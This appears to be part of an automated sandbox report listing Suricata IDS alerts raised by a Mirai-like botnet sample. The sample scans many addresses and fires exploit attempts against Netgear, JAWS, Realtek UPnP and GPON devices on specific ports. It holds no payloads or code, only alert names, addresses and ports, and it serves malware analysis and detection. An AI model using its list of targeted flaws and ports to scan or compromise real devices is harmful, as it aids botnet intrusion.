                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52130 -> 71.53.95.73:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32834 -> 76.152.169.208:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47342 -> 209.214.96.254:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52046 -> 197.18.25.237:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42588 -> 150.149.68.200:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55076 -> 65.55.17.33:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43430 -> 164.167.9.70:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:58570 -> 111.178.117.79:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43430 -> 164.167.9.70:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46566 -> 110.53.18.20:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55994 -> 44.79.80.80:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:52160 -> 93.175.168.155:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55058 -> 156.94.30.236:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34854 -> 176.190.233.75:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47010 -> 128.160.247.151:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45202 -> 175.127.32.99:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39176 -> 8.153.189.211:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59024 -> 39.56.166.80:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46092 -> 14.231.177.47:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44352 -> 68.164.136.214:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60216 -> 87.41.98.96:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48550 -> 163.29.225.109:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35292 -> 216.225.199.77:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59526 -> 112.149.230.147:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49396 -> 103.249.111.10:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36814 -> 100.12.64.164:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:43144 -> 61.177.7.93:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46208 -> 98.140.243.164:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51316 -> 215.40.71.26:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51176 -> 199.201.191.100:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53140 -> 94.210.13.65:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49046 -> 75.202.127.58:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60934 -> 49.174.147.72:52869
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60216 -> 87.41.98.96:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39918 -> 86.204.100.185:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55162 -> 15.113.25.131:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51612 -> 161.142.203.178:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45202 -> 175.127.32.99:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35580 -> 68.79.128.122:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56276 -> 58.13.152.91:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60758 -> 50.82.114.48:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60758 -> 50.82.114.48:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45058 -> 222.71.55.197:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49580 -> 20.60.103.147:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58286 -> 184.63.218.127:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36988 -> 68.81.189.11:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34448 -> 108.32.60.179:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48470 -> 220.125.66.200:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45496 -> 209.173.57.59:7574
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:33380 -> 176.126.172.174:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34650 -> 14.206.36.67:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36202 -> 151.33.64.10:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53268 -> 212.67.65.96:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54252 -> 27.224.177.188:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59770 -> 87.28.80.213:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46756 -> 220.213.171.152:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46756 -> 220.213.171.152:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41766 -> 48.128.115.213:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45058 -> 222.71.55.197:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45748 -> 75.221.225.250:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:34816 -> 143.125.99.60:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55176 -> 78.194.76.189:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55040 -> 217.112.237.238:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47524 -> 6.220.203.209:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49124 -> 63.216.152.237:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49900 -> 158.11.245.225:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:59942 -> 134.101.144.103:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54984 -> 74.232.116.96:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38514 -> 122.52.227.5:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43612 -> 89.118.233.39:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33060 -> 45.122.179.192:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33348 -> 71.241.194.217:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33348 -> 71.241.194.217:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54842 -> 109.73.44.115:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53220 -> 191.108.27.83:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:42400 -> 102.193.207.146:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:50770 -> 9.15.166.129:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57684 -> 82.116.130.80:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33188 -> 211.75.126.69:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:59388 -> 92.61.151.177:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47488 -> 129.113.117.201:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42084 -> 217.237.30.89:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44686 -> 126.30.37.34:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40128 -> 102.244.106.84:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39452 -> 28.46.37.247:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49792 -> 36.30.167.44:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46222 -> 122.119.110.139:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:53326 -> 93.186.174.180:52869
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46222 -> 122.119.110.139:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:39868 -> 209.78.212.21:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:44986 -> 191.45.226.73:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51316 -> 215.40.71.26:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:55336 -> 130.67.243.6:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:57598 -> 75.158.5.139:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:57650 -> 156.166.198.160:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:37466 -> 14.55.151.40:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:32862 -> 218.240.42.107:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:55898 -> 19.97.225.232:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54842 -> 109.73.44.115:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53776 -> 196.163.229.29:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:34650 -> 14.206.36.67:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:45914 -> 99.57.40.174:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:50310 -> 119.24.183.33:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49124 -> 63.216.152.237:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:56276 -> 58.13.152.91:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:50118 -> 63.93.5.53:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49580 -> 20.60.103.147:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:34448 -> 108.32.60.179:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:39610 -> 105.99.123.173:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59062 -> 152.17.230.207:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:48266 -> 125.76.215.12:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:57344 -> 188.62.117.113:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:32834 -> 76.152.169.208:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:55076 -> 65.55.17.33:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53220 -> 191.108.27.83:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:55176 -> 78.194.76.189:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51846 -> 166.252.165.142:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:41004 -> 145.189.228.46:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46208 -> 98.140.243.164:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:43596 -> 101.192.66.201:52869
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:52130 -> 71.53.95.73:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38054 -> 109.85.10.60:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:48672 -> 142.101.125.225:52869
                            Source: global trafficTCP traffic: 100.49.226.162 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 109.227.125.29 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 44.237.251.105 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 152.127.1.190 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 97.91.236.206 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 152.0.87.200 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 199.201.191.100 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 52.160.156.2 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 146.25.213.174 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 48.128.115.213 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 175.176.33.31 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 196.204.108.175 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 85.206.232.118 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 46.89.254.44 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 75.221.225.250 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 221.219.229.131 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 114.117.212.4 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 198.219.16.2 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 79.254.93.26 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 151.95.79.143 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 163.197.220.203 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 134.87.142.186 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 169.189.175.4 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 107.201.204.124 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 6.205.85.158 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 74.42.253.221 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 202.214.164.77 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 144.95.201.80 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 73.230.184.19 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 137.40.92.251 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 106.222.158.5 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 58.37.190.45 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 217.112.237.238 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 79.35.50.92 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 38.7.77.71 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 190.22.11.98 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 36.64.74.203 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 211.75.126.69 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 33.93.201.252 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 68.169.46.188 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 175.170.71.155 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 126.210.97.150 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 128.39.179.200 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 111.4.180.69 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 58.189.121.169 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 54.197.126.116 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 82.222.192.8 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 8.189.90.201 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 187.38.102.206 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 2.144.168.159 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 91.91.58.110 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 9.56.220.231 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 111.150.127.171 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 82.114.241.74 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 171.119.20.118 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 215.230.56.175 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 128.160.247.151 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 171.177.75.220 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 164.49.37.152 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 61.77.120.5 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 101.189.50.38 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 169.158.193.51 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 217.15.207.28 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 180.113.188.93 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 84.108.181.121 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 100.12.64.164 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 86.214.31.28 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 121.95.76.250 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 186.96.78.186 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 143.207.148.54 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 84.51.179.123 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 110.87.214.87 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 123.86.59.14 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 9.15.166.129 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 159.175.193.207 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 83.88.254.107 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 131.62.122.210 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 178.233.21.105 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 68.101.86.227 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 25.125.5.55 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 132.20.246.253 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 165.72.140.124 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 100.215.73.157 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 139.246.211.115 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 153.118.180.181 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 24.168.141.210 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 220.112.244.93 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 125.125.201.185 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 203.211.100.123 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 178.25.78.182 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 87.170.218.169 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 141.244.188.12 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 124.127.132.57 ports 2,5,6,8,9,52869
